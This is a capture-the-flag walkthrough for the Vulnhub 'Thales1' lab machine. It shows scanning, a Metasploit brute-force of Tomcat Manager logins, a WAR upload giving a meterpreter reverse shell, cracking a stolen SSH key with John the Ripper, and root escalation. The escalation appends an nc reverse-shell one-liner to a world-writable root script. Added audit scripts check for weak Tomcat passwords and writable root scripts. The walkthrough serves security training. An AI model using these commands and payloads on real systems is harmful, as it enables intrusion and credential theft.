Vulnhub Lab Walkthrough #303: Thales1
Thales1 Vulnhub Walkthrough
"Thales" is a capture-the-flag challenge on Vulnhub. Credit goes to MachineBoy for building this machine. https://www.vulnhub.com/entry/thales-1,749/ In this tutorial we will learn how to gain system access by exploiting a vulnerability in a Tomcat Application Manager instance, and how to gain root access by abusing a script that runs with root privileges. Let's see how to compromise this machine step by step.
1. Network Scanning
1.1 First, we scan the network with netdiscover to find the IP address of the victim machine.
We find that the victim machine's IP address is 192.168.2.117.
┌──(root㉿kali)-[~]
└─# netdiscover -r 192.168.2.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 61 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 3660
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.2.1     5e:ec:47:29:ea:18     10     600  Unknown vendor
 192.168.2.117   08:00:27:e5:33:20      8     480  PCS Systemtechnik GmbH
 192.168.2.127   f0:2f:74:1a:39:e7     22    1320  ASUSTek COMPUTER INC.
 192.168.2.129   54:05:db:05:79:fd     15     900  LCFC(Hefei) Electronics T
 192.168.2.243   d0:11:e5:77:95:09      6     360  Apple, Inc.
1.2 Next, we run an aggressive scan (-A) to enumerate the open ports and find the following port details:
nmap -A 192.168.1.175
From the Nmap output we get:
an SSH server (OpenSSH) on port 22
an HTTP service (Apache Tomcat) on port 8080
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.2.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 08:06 EDT
Nmap scan report for miletus.lan (192.168.2.117)
Host is up (0.00052s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
| 256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_ 256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open http Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:E5:33:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms miletus.lan (192.168.2.117)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.52 seconds
┌──(root㉿kali)-[~]
└─#
2. Enumeration
2.1 Abusing HTTP
Now let's see whether we can get anything interesting from port 8080. Since Apache Tomcat is running on port 8080, we can open it in the browser right away.
We note the Tomcat version: 9.0.52
URL: http://192.168.2.117:8080
3. Exploitation
3.1 Metasploit
Now let's start msfconsole. We use the auxiliary scanner module to brute-force the Tomcat Manager login, with Metasploit's default wordlist for the passwords.
As a result we get the Tomcat credentials tomcat:role1.
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set username tomcat
username => tomcat
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[+] 192.168.2.117:8080 - Login Successful: tomcat:role1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/tomcat_mgr_login) >
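The brute-force above only works because a Manager account carries a guessable password. The following POSIX shell check is an added example, not part of the original walkthrough and not Tomcat's own tooling; it assumes the stock tomcat-users.xml layout with one `<user .../>` element per line, and the list of well-known default passwords is constructed here (a second argument can replace it).

```shell
#!/bin/sh
# Added example, not code from the original walkthrough or from Tomcat.
# audit_tomcat_users FILE [WEAKLIST]: prints one line per account that holds a
# Manager/Host Manager role (manager-* or admin-*), marking passwords that are
# empty, equal to the username, or on the constructed default list.
# Returns 1 if any such account is weak, 0 otherwise.
audit_tomcat_users() {
    file=$1
    weak=${2:-"tomcat s3cret role1 admin password manager changeit"}
    out=$(grep -o '<user [^>]*' "$file" | while read -r el; do
        u=$(printf '%s' "$el" | sed -n 's/.*username="\([^"]*\)".*/\1/p')
        p=$(printf '%s' "$el" | sed -n 's/.*password="\([^"]*\)".*/\1/p')
        r=$(printf '%s' "$el" | sed -n 's/.*roles="\([^"]*\)".*/\1/p')
        # Only roles that reach the Manager or Host Manager apps matter here.
        case ",$r," in
            *,manager-*|*,admin-*) ;;
            *) continue ;;
        esac
        verdict=OK
        [ -z "$p" ] && verdict="WEAK(empty)"
        [ "$p" = "$u" ] && verdict="WEAK(equals-username)"
        for w in $weak; do [ "$p" = "$w" ] && verdict="WEAK(default)"; done
        printf '%s %s roles=%s\n' "$verdict" "$u" "$r"
    done)
    printf '%s\n' "$out"
    case "$out" in *WEAK*) return 1 ;; esac
    return 0
}
```

Run it as `audit_tomcat_users /opt/tomcat/conf/tomcat-users.xml` (path as used on this box); a digested password that is not on the list is reported as OK, so the check complements, rather than replaces, a password policy.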
3.2 Since we have enumerated the Tomcat Manager login credentials, we can try a reverse connection by deploying a malicious Java payload. We will use this to obtain a meterpreter shell.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword role1
httppassword => role1
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.2.185:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying XBTLaZYyu...
[*] Executing XBTLaZYyu...
[*] Undeploying XBTLaZYyu ...
[*] Sending stage (58073 bytes) to 192.168.2.117
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.2.185:4444 -> 192.168.2.117:42922) at 2025-05-31 09:35:29 -0400

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040554/r-xr-xr--  4096  dir   2021-10-14 07:28:04 -0400  thales

meterpreter > cd thales/
meterpreter > ls
Listing: /home/thales
=====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100001/--------x  457   fil   2021-10-14 07:30:45 -0400  .bash_history
100445/r--r-xr-x  220   fil   2018-04-04 14:30:26 -0400  .bash_logout
100445/r--r-xr-x  3771  fil   2018-04-04 14:30:26 -0400  .bashrc
040001/--------x  4096  dir   2021-08-15 12:58:00 -0400  .cache
040001/--------x  4096  dir   2021-08-15 12:58:00 -0400  .gnupg
040555/r-xr-xr-x  4096  dir   2021-08-15 13:50:29 -0400  .local
100445/r--r-xr-x  807   fil   2018-04-04 14:30:26 -0400  .profile
100445/r--r-xr-x  66    fil   2021-08-15 13:50:18 -0400  .selected_editor
040777/rwxrwxrwx  4096  dir   2021-08-16 16:34:04 -0400  .ssh
100445/r--r-xr-x  0     fil   2021-10-14 06:45:25 -0400  .sudo_as_admin_successful
100444/r--r--r--  107   fil   2021-10-14 05:36:43 -0400  notes.txt
100000/---------  33    fil   2021-08-15 14:18:54 -0400  user.txt

meterpreter >
3.3 After getting the meterpreter shell, we navigate to the "home" directory, where we find a subdirectory named "thales". Inside "thales" we find two files, user.txt and notes.txt, as well as an .ssh directory.
3.4 We observe that both a public key (id_rsa.pub) and a private key (id_rsa) are present on the victim machine. The private key is used for login. We now download the private key to our Kali machine.
meterpreter > cd .ssh
meterpreter > ls
Listing: /home/thales/.ssh
==========================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 1766 fil 2021-08-16 16:34:04 -0400 id_rsa
100444/r--r--r-- 396 fil 2021-08-16 16:34:04 -0400 id_rsa.pub

meterpreter > download id_rsa /root/Desktop/
[*] Downloading: id_rsa -> /root/Desktop/id_rsa
[*] Downloaded 1.72 KiB of 1.72 KiB (100.0%): id_rsa -> /root/Desktop/id_rsa
[*] Completed : id_rsa -> /root/Desktop/id_rsa
meterpreter >
3.5 The id_rsa file we downloaded is passphrase-protected, so we need to convert the key into a hash that "john" can crack. First we convert the key into a hash with the "ssh2john" command.
3.6 Now we can try to crack the hash with John the Ripper, using the wordlist "rockyou.txt".
┌──(root㉿kali)-[~/Desktop]
└─# locate ssh2john
/usr/bin/ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/__pycache__/ssh2john.cpython-313.pyc
┌──(root㉿kali)-[~/Desktop]
└─# /usr/share/john/ssh2john.py id_rsa > sshhash
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
fopen: /usr/share/wordlists/rockyou.txt: No such file or directory
┌──(root㉿kali)-[~/Desktop]
└─# wordlists -h
> wordlists ~ Contains the rockyou wordlist
/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt
Do you want to extract the wordlist rockyou.txt? [Y/n] y
Extracting rockyou.txt.gz...
> wordlists ~ Contains the rockyou wordlist
/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt
┌──(root㉿kali)-[~]
└─# cd Desktop
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06 (id_rsa)
1g 0:00:00:00 DONE (2025-05-31 09:45) 1.162g/s 3325Kp/s 3325Kc/s 3325KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
3.7 Once we have a shell, we upgrade the non-interactive shell to a partially interactive one with the following command (on this target only python3 is installed, so the command is run with python3, as the session below shows):
python -c 'import pty; pty.spawn("/bin/bash")'
Since we have cracked the password of user "thales", let's switch to the thales user.
3.8 After switching to thales, we use the "id" command to view the real and effective user and group IDs. We find that thales is a non-root user.
3.9 We now use "sudo -l" to check which commands user thales may run as root.
We find that user thales is not allowed to run any command as root. So let's now search for interesting files.
3.10 We get a hint in notes.txt that a backup script has been prepared for us at /usr/local/bin/backup.sh.
meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -c 'import pty; pty.spawn("/bin/bash")'^[[D^[[D^[[D^[[D^[[D^[[1;5D^?
/bin/sh: 2: python: not found
/bin/sh: 2: 5D: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@miletus:/home/thales$ su thales
su thales
Password: vodka06
thales@miletus:~$ id
id
uid=1000(thales) gid=1000(thales) groups=1000(thales),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
thales@miletus:~$ sudo -l
sudo -l
[sudo] password for thales: vodka06
Sorry, user thales may not run sudo on miletus.
thales@miletus:~$ cd /home
cd /home
thales@miletus:/home$ ls
ls
thales
thales@miletus:/home$ cd thales
cd thales
thales@miletus:~$ ls
ls
notes.txt user.txt
thales@miletus:~$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
thales@miletus:~$
3.11 Now let's inspect backup.sh. We find that the file is readable, writable and executable by everyone, and that its owner is root.
thales@miletus:~$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
####################################

# What to backup.
backup_files="/opt/tomcat/"

# Where to backup to.
dest="/var/backups"

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"
date

# Long listing of files in $dest to check file sizes.
ls -lh $dest
thales@miletus:~$ ls -la /usr/local/bin/backup.sh
ls -la /usr/local/bin/backup.sh
-rwxrwxrwx 1 root root 612 Oct 14  2021 /usr/local/bin/backup.sh
thales@miletus:~$
4. Privilege Escalation
Since backup.sh is writable, we can edit the script by injecting a reverse-shell payload and expect to get root shell access.
4.1 On our attacking machine (Kali) we start a Netcat listener on port 8888 to catch the shell.
4.2 In the terminal, run the following command to append the malicious payload to the backup.sh script.
thales@miletus:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.185 8888 >/tmp/f" >>backup.sh
thales@miletus:~$
4.3 Because it is a backup script that runs automatically, it hands us a reverse shell with root privileges on port 8888.
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvp 8888
listening on [any] 8888 ...
connect to [192.168.2.185] from miletus.lan [192.168.2.117] 43530
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
#
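The root cause of this escalation is a script that a scheduler runs as root but that any local user can modify. The following POSIX shell audit is an added example, not part of the original walkthrough; it assumes GNU coreutils stat, takes the account the script is executed as (default root) as an optional second argument, and flags an owner mismatch, group or world write bits, and a world-writable parent directory without the sticky bit.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# audit_root_script FILE [OWNER]: FILE is run by a scheduler as OWNER (default
# root). Returns 0 if only OWNER can change it, 1 if another user could edit
# or replace it, which is exactly what the appended payload above relies on.
audit_root_script() {
    f=$1
    want=${2:-root}
    [ -f "$f" ] || { echo "SKIP  $f: not a regular file"; return 2; }
    bad=0
    owner=$(stat -c %U "$f")                              # GNU coreutils stat
    perm=$(stat -c %a "$f"); perm=${perm#"${perm%???}"}  # last 3 octal digits
    ug=${perm%?}; g=${ug#?}; o=${perm#??}                 # group / other digit
    if [ "$owner" != "$want" ]; then
        echo "BAD   $f: owned by $owner but executed as $want"; bad=1
    fi
    if [ $((g & 2)) -ne 0 ]; then
        echo "BAD   $f: group-writable (mode $perm)"; bad=1
    fi
    if [ $((o & 2)) -ne 0 ]; then
        echo "BAD   $f: world-writable (mode $perm)"; bad=1
    fi
    # A world-writable parent without the sticky bit lets the file be replaced.
    dir=$(dirname "$f")
    dperm=$(stat -c %a "$dir"); dperm=${dperm#"${dperm%???}"}
    oth=${dperm#??}
    if [ $((oth & 2)) -ne 0 ] && [ ! -k "$dir" ]; then
        echo "BAD   $f: parent $dir is world-writable without sticky bit"; bad=1
    fi
    [ "$bad" -eq 0 ] && echo "OK    $f (owner $owner, mode $perm)"
    return "$bad"
}

# Audit every regular file in the given files/directories; 1 if any is bad.
audit_scheduled_scripts() {
    rc=0
    for p in "$@"; do
        if [ -d "$p" ]; then
            for s in "$p"/*; do
                [ -f "$s" ] && { audit_root_script "$s" || rc=1; }
            done
        else
            audit_root_script "$p" || rc=1
        fi
    done
    return "$rc"
}
```

On a host, `audit_scheduled_scripts /usr/local/bin /etc/cron.d /etc/cron.daily` covers the locations a cron-driven backup like the one above typically lives in; any BAD line is a finding to fix with `chown root` and `chmod 755` (or stricter).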